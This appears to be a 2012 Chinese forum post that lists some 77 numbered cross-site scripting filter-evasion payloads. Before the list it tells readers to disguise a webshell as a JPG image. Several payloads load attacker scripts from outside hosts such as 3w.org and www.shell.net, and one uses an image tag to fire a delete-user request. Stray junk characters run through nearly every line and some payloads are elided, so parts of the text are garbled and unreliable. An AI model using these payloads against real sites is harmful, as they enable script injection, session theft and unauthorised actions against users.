跨站图片shell
. n* m5 o8 Q: K6 N1 `XSS跨站代码 <script>alert("")</script>
! d0 W" @4 f1 f x. w3 M8 L
9 G: H$ G4 n9 S- }* A% r将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
$ P8 C @6 L' B3 e
+ M5 }% I* Q$ y& U
( k6 }( o2 M6 V c
! t5 w+ O/ {7 V# c' v9 n1)普通的XSS JavaScript注入
3 A3 q+ X+ o; j% h<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>! \. j1 |8 [4 ], }
) S6 \6 { P! m2 j
(2)IMG标签XSS使用JavaScript命令! f% I' x9 ]( ~6 M3 ^
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. M: Z' y4 W' @! F* ?/ T8 b
9 ~+ ~5 V/ q& @- k(3)IMG标签无分号无引号: H- h& f, t# [
<IMG SRC=javascript:alert(‘XSS’)>( }* Q. u: O: D% X
6 G+ r0 @) O- L3 u z(4)IMG标签大小写不敏感 c$ T8 G3 w0 ?/ [3 G
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
1 S# x4 f3 \% B5 T/ j2 E9 [
* @4 c6 e+ A9 L& p% n% ](5)HTML编码(必须有分号)3 v& m" Y4 l1 l
<IMG SRC=javascript:alert(“XSS”)>9 S8 n \/ e7 D' F* E- e
0 L( x# Q; w. V- {+ |( J% M(6)修正缺陷IMG标签5 U* `4 O- `" ~; [1 o w6 R1 W
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
- @! b3 e; [) F2 N+ G; z B6 e& e$ b; S) g2 ?. f/ A
(7)formCharCode标签(计算器)( f9 O! x# {9 S. n0 J/ P0 J1 |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))># c& i; M* i' u* ?( l0 H" b
k' L7 P: ?/ E0 d/ y, @7 ^(8)UTF-8的Unicode编码(计算器)8 w) R/ y' |7 i" Y* ^: g8 w {
<IMG SRC=jav..省略..S')>' k2 w' {( V* T3 R. Y& |+ O4 Y
! t/ r, c* G& V3 Y; s
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)7 {* D4 ~' r/ |1 u0 Y
<IMG SRC=jav..省略..S')>
6 w G/ Q1 u' v4 C/ v) b+ d: ~, ]/ |& l+ I
(10)十六进制编码也是没有分号(计算器). p1 i7 m: z8 W
<IMG SRC=java..省略..XSS')>
* `' [7 q5 y4 a6 w' C; o& w/ C. ]8 Z( A& `
(11)嵌入式标签,将Javascript分开
. ?0 \/ H% O5 P- S: G# z<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 K, ?2 M: t1 a
- L; t& C5 P( L# z' q9 c/ j(12)嵌入式编码标签,将Javascript分开
% w+ M9 k! r2 C3 q<IMG SRC=”jav ascript:alert(‘XSS’);”>- g' T. V, U1 g
5 i& U, U4 d/ U! @' b0 v! G
(13)嵌入式换行符' @2 m. I# R+ i9 [
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 k3 x3 X2 X7 W% q( ~ k/ _* m! }# h3 { Y) B! Z+ ^$ J2 F
(14)嵌入式回车
6 ]6 p8 r1 S0 ^) ?' N' b/ U<IMG SRC=”jav ascript:alert(‘XSS’);”>
# F2 _7 }) i& H( J+ c
3 b9 P( s3 z+ z(15)嵌入式多行注入JavaScript,这是XSS极端的例子! G1 i! a4 V) p
<IMG SRC=”javascript:alert(‘XSS‘)”>) l2 O0 U1 h4 w" j' T! Y+ U
+ R. P7 O$ n. a# H1 c, _(16)解决限制字符(要求同页面): W* a0 D- B( \. w- f1 B
<script>z=’document.’</script>
# m4 H0 V4 B( d3 J! @' g8 X<script>z=z+’write(“‘</script>! {7 o: l" T, t8 t
<script>z=z+’<script’</script>- b1 l, w) J6 F7 V7 d% y; Q. f
<script>z=z+’ src=ht’</script>
7 y5 b+ A1 r) E7 F) c: j1 m+ \8 E<script>z=z+’tp://ww’</script>' j T+ u5 } |, _5 y& r
<script>z=z+’w.shell’</script>* F$ f7 _$ x! x) ~7 g) R, A( H
<script>z=z+’.net/1.’</script>
3 v1 u! a( R) p$ ]! C: ?<script>z=z+’js></sc’</script>3 G1 h* J4 b" X; v8 z
<script>z=z+’ript>”)’</script>5 ?" Z2 R$ L" `( x1 q1 d# L: \
<script>eval_r(z)</script>; s' w1 b$ i) E% m4 t
2 X1 l+ |, x% u( P7 S(17)空字符, U! `( l( z" L7 {: W$ H9 K/ s
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
9 s* m/ f \, |# e1 m( P
$ s/ r' Y% M! ~5 m0 Y# ?(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
6 O- A/ n0 \' H, _# n/ j% ]- Operl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out/ k$ R' M2 Z+ e" M$ |- y
\$ \1 h2 z: M7 d2 h(19)Spaces和meta前的IMG标签
8 ]: Q5 a. \& v) d<IMG SRC=” javascript:alert(‘XSS’);”>; N: A: O: ]! y7 y) a
& x( h! e, ~) Y: U8 y9 @
(20)Non-alpha-non-digit XSS/ w) P* q& H, o% Q3 s/ V k
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>& B+ {) P [8 V v8 w
/ ~" q; _* B J, W(21)Non-alpha-non-digit XSS to 28 G1 x$ o$ O0 w
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>% u" R# ?9 p( o6 y
* {$ n1 Z; `: z, j, G- H
(22)Non-alpha-non-digit XSS to 3+ j& U, U2 `- C
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ f3 W3 H/ G7 S+ Z9 H# p
5 \% P( C; a( M(23)双开括号
# c) a' z Z7 a<<SCRIPT>alert(“XSS”);//<</SCRIPT>8 Q+ ^9 ?" X% A" q8 K
) q* S6 O; O% X! a# q
(24)无结束脚本标记(仅火狐等浏览器)
2 Q2 i0 \; j# u* w5 R M. b$ k<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
3 t* @ G# ?$ g
( s4 r0 ^3 Q j" a; r(25)无结束脚本标记2
1 D7 P. x$ S! t( b<SCRIPT SRC=//3w.org/XSS/xss.js>
4 W# J, g8 a( F4 t ^% V( X) F6 u0 z4 U. q6 A J2 @& V
(26)半开的HTML/JavaScript XSS
$ \1 }( Z- N6 L# o# T8 @8 G<IMG SRC=”javascript:alert(‘XSS’)”
2 e7 K) O. r) P0 v+ Q7 V& P5 w) V r" u) E" y
(27)双开角括号
. j. i- S% p1 W<iframe src=http://3w.org/XSS.html <
1 V% z* D1 @; T0 O& ]% D& z7 j* J/ k' y
(28)无单引号 双引号 分号; k$ b/ ]) S2 G
<SCRIPT>a=/XSS/
& j7 @: C4 ^8 t$ H- {alert(a.source)</SCRIPT>
- G( }4 P6 l1 h3 x, @" e7 @( g
' p0 D! W- o/ e7 m- M: J6 l/ I8 ?(29)换码过滤的JavaScript& n( o4 g- K9 X, u% h+ ?1 U
\”;alert(‘XSS’);//4 J% p6 w3 C$ ?3 F! M. U8 M& g1 b
- R2 i+ C( z9 r5 d(30)结束Title标签& X6 ?8 B3 ?0 B
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>( B3 O2 V3 b% y7 c: j
/ X1 I( Q7 g8 @% q; U1 T
(31)Input Image
5 A% _ P6 E3 T" G<INPUT SRC=”javascript:alert(‘XSS’);”>
, d' a- G) v1 o/ t5 X- o
# f# h& ]! @( C' k# h. t' R(32)BODY Image
& a5 U. |. s2 e5 V/ ~<BODY BACKGROUND=”javascript:alert(‘XSS’)”>( }& a6 z) w g
1 Z, D% d' k0 F' H" d(33)BODY标签
) G' P8 R# a5 a V& A<BODY(‘XSS’)>
1 f2 f# v3 V$ h6 Q6 {0 t' e+ e R) p- l. u/ S4 d
(34)IMG Dynsrc
/ Y! A. F/ a& V( N+ c( [( s<IMG DYNSRC=”javascript:alert(‘XSS’)”>
3 g1 Q" ^3 `: I" M* J. p( _3 W- W" V a1 a
(35)IMG Lowsrc# c$ x3 d/ W2 q! S
<IMG LOWSRC=”javascript:alert(‘XSS’)”>( V, g+ K5 b6 o. a$ B5 Q
( s2 K: K* ?( d$ c6 t(36)BGSOUND' a6 c5 x2 @9 ?9 c, e
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
4 o H% g x5 L6 m' y) J* c" Z, l n8 x$ j4 a1 G( u6 G
(37)STYLE sheet
5 n+ [ D- g/ j3 l<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
$ F( |: ^' C& k' ?4 Y3 q2 Y* |
8 H; @, {: W7 ^$ {" U; o(38)远程样式表2 W+ m' G4 X& K5 w! ~2 @$ y3 y
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
% v% e: W, h+ L2 }
5 D, X" B' X' _$ w+ \. E(39)List-style-image(列表式)3 i9 l. z" X& ~! W3 [4 I1 {
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS" w4 f8 f, D. ~* x1 Q" c" | ^
/ P7 Z* {* G f- i6 w" j3 E
(40)IMG VBscript& X" |. g& u8 _
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
# {0 a5 t( E* F- c( A+ ?+ ?& \* t' r, S( e: k9 _8 x
(41)META链接url
& O3 v Y. F2 x& q( N; [1 w8 r! V4 Q+ d<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>& R9 Z( D) G, q% Y
8 ]: h; s2 ?0 U9 ?4 T(42)Iframe
" Q2 k4 z- Y: w7 Y% V<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
0 H! X% p; ^0 @* k: L3 p3 P( o. \: s(43)Frame: ? Q2 `* P, q0 F* y, S
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>, R; @6 i% v: r! C) s. e
+ r7 X* f6 _$ o9 A& w5 B(44)Table3 g/ M& i3 H5 T6 i: l+ A! W5 H
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>7 {! N( h1 z1 y2 p( c9 P
3 U) n! M, M7 T. p D# d" f7 I
(45)TD
5 \5 R: W3 r% |9 E1 N5 u s<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
4 O1 z* D2 q. o8 I8 U
& y O' ?% l- I- M(46)DIV background-image9 s, I2 P# P/ k
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>( s4 U. ?7 F( O
2 m7 o# @+ a! j& H(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
( D P ~; z0 [* b<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>) F3 Q& A7 u& q" {
/ O5 k2 O5 I; F- g( @(48)DIV expression+ n3 e# c7 h, \7 b% ~# d. X
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>. P6 [7 m% k- a1 d3 |& Q
* L5 T4 |* `7 j9 P! H(49)STYLE属性分拆表达9 H: e5 s) m* n3 `
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
% G- G% A/ b* w2 e9 M) o( e5 {# W7 a* J4 ?. H% s- f
(50)匿名STYLE(组成:开角号和一个字母开头)
% W# S, }. u# R: Q& T6 d<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
q& g8 N; U/ Y* b0 m8 `& r( D6 N. U8 c a
(51)STYLE background-image3 y4 I. m5 k2 }* ^8 k
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
B% L. g3 r; f% R8 |! Z( _3 X4 q8 H& v, T: l3 u! o7 S
(52)IMG STYLE方式
0 [1 W( X( L [$ J- i. y0 Q8 f0 texppression(alert(“XSS”))’>7 t) X f; D4 G! ]8 Q7 P0 f- I6 _) q
' b! s& f( M0 G; x* i. Q6 R
(53)STYLE background+ L: J) k1 W# o/ T0 p7 W
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
! m% w. |2 Y; |0 P% ~4 [( H- S( f4 M; b! h4 G U
(54)BASE
$ l* Y' l8 S, u5 }& V<BASE HREF=”javascript:alert(‘XSS’);//”>
, O# r8 ^7 j$ N) s# r% U% B: V3 J) k$ P. _! z) Z0 n. }0 K
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
) R9 y5 c+ l. Q5 T3 Q( `1 b- m<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>+ E. V5 x' |3 V. ]
% R/ C' X1 ^/ ?+ n; Y7 Y7 t(56)在flash中使用ActionScrpt可以混进你XSS的代码
; @$ Z9 e3 S8 X/ s, J2 W" f) |a=”get”;
) E& b* \* ~: P8 @7 c& R$ {* rb=”URL(\”";
$ ~- r! U- a. {! ]4 z1 x7 xc=”javascript:”;
9 s1 O! c' L2 X7 A) Qd=”alert(‘XSS’);\”)”;0 ~$ c; V7 K- D+ t/ `
eval_r(a+b+c+d);& S8 n0 V. [4 Z& n; p
& j! X. j/ X8 }' D) A( C(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上; I# O% `! X% p1 |1 V
<HTML xmlns:xss>
1 O9 q7 i- ] }<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
* m( K% I9 I4 Q# W: y# f& `<xss:xss>XSS</xss:xss>% z! J0 J4 S9 U4 G( J8 r) b
</HTML>! k: S4 w4 p& W9 j) Y" n
# S* j! h5 C; z; g8 W+ H(58)如果过滤了你的JS你可以在图片里添加JS代码来利用' }0 V8 U4 `# T# Z. G
<SCRIPT SRC=””></SCRIPT>
* u+ }( `6 |; f1 E: }) T3 e! k2 v ^ B
(59)IMG嵌入式命令,可执行任意命令+ F& ~! a) t6 Q! H
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
4 M/ o- ]: t( J" V) Z. }0 ?4 d. E ~" r* V5 T0 s6 T9 W5 Z0 V
(60)IMG嵌入式命令(a.jpg在同服务器)
! v3 y* K7 e' IRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
2 S) f( } A) y6 S' m: I3 \3 ]8 J# |4 V, m
(61)绕符号过滤
- ~: Z* q+ M8 a' M<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 n1 a; w( i3 A0 T( z& b/ }) D0 p6 {! b
(62)
% q: q; T1 e! d$ n" ]* W<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 x6 a1 I4 ^- O2 d' l* J' Y* n
0 B( |* Y" y9 D+ f9 m- A, O& h4 @# p(63)
% g7 _* z+ y- l' K0 `<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
3 i V4 c0 W1 |1 H3 D
% |( ?8 u0 D, {5 T- U5 q(64)
9 ^' X/ A4 e' K% C<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>$ t, Y- B F$ u' |" q4 d, f( c8 f
# n$ ? P" J2 j: T
(65)
9 f. M7 P4 \# E1 e: x: k: O( J3 C6 S<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>8 V1 H8 H- [2 O" w
7 c5 Y' W+ u. `" P(66)+ N9 E0 y+ T. m" b$ E
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>+ o$ u# R i* `8 ~9 i
* V+ A4 S2 ~3 R4 B4 ?8 b( _8 H(67)' a! A& H% j4 H8 T2 N2 _' A
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>( S \# I# k7 Z$ R
' F; F0 M" P5 ?, l% |0 d
(68)URL绕行 Q4 w& @! r8 _5 _' `$ d
<A HREF=”http://127.0.0.1/”>XSS</A>* Y$ {8 R) u' f1 D# E/ x ]( X
2 C4 U! I5 k* L5 K* w+ d
(69)URL编码7 H7 u n& j; F) U: T& e
<A HREF=”http://3w.org”>XSS</A>
" l1 X' N* F4 ^$ g7 g+ K" l9 A! s8 k3 k2 [; d9 {2 ^6 A3 F% Z
(70)IP十进制
$ n( t+ A* ^* o7 m" ^% k6 r2 X- m<A HREF=”http://3232235521″>XSS</A>. ^/ a: t/ o6 U. x! ?; `; G, q [
8 y0 I S4 U; u5 B: H9 R+ v# I
(71)IP十六进制
. T" R' L0 F( E) x<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
+ I% |& R. v! @( H. Z* [0 L3 G
$ a$ |/ m6 {1 f9 e! O" [7 w" ](72)IP八进制( n5 N9 m1 j5 e. D$ o3 C
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
; M& }+ ~5 [8 o8 T6 |* c) c' S4 u
(73)混合编码
9 D7 T x2 p K<A HREF=”h
7 ?# S8 p! z- J& Jtt p://6 6.000146.0×7.147/”">XSS</A>7 s3 l! O, V: C' _2 H
# S7 U1 H! v" m' a; y3 G(74)节省[http:]
4 i' W9 G. l+ j3 S<A HREF=”//www.google.com/”>XSS</A>
6 v) {" S) |/ Z
" V& a4 n6 O( X7 a4 r( ](75)节省[www]
y% [( D" z1 C8 x8 C4 V% {<A HREF=”http://google.com/”>XSS</A>- y0 @: Z5 K, f! ^5 g. }
" S6 I9 G7 a, k" M) @+ }6 ?# N(76)绝对点绝对DNS( g7 A: M) [" A" q, k
<A HREF=”http://www.google.com./”>XSS</A>
- S5 {) n$ F/ }4 f7 L; t; i- B6 ^. n/ ]+ `$ a
(77)javascript链接
' E- ^7 W0 e* \% o( Z3 s% I: M<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>1 E* }& M, ^; ]# {; E! _
|
发表于 2012-9-13 17:04:56
收藏
支持
反对